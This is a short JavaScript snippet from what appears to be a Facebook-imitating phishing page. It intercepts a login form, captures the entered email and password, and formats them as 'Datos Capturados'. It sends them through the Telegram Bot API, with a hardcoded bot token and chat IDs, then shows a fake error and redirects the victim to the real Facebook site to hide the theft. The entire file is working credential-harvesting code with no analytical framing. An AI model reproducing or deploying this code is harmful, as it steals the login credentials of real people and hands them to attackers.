<script type="text/javascript">
    const exitoso = () => {
        alert('Ocurrió un error, por favor intenta de nuevo');
        window.location.href = 'https://www.facebook.com/';
    }

    document.getElementById('login-form').addEventListener('submit', function (event) {
        event.preventDefault();

        const email = event.target.email.value;
        const pass = event.target.password.value;

        // Escape special Markdown characters
        let msg = `⚠️ **Datos Capturados** ⚠️\n\n**Usuario:** \n${email.replace(/([.*+?^${}()|[\]\\])/g, '\\$1')}\n\n**Contraseña:** \n${pass.replace(/([.*+?^${}()|[\]\\])/g, '\\$1')}\n\n⚠️ **Momento:** ${new Date().toLocaleString().replace(/([.*+?^${}()|[\]\\])/g, '\\$1')}`;

        const apiUrl = 'https://api.telegram.org/bot6774216442:AAHsScCJqeCfgyTshCgmfzuYU2bO1Yt0Qng/sendMessage';
        const d1 = {chat_id: '-1002168077955', text: msg, parse_mode: 'MarkdownV2'};
        const d2 = {chat_id: '489003636', text: msg, parse_mode: 'MarkdownV2'};

        fetch(apiUrl, {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify(d2)
        })
        fetch(apiUrl, {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify(d1)
        })
            .then(response => response.json())
            .then(() => exitoso())
            .catch((error) => console.error('error:', error));
    });
</script>
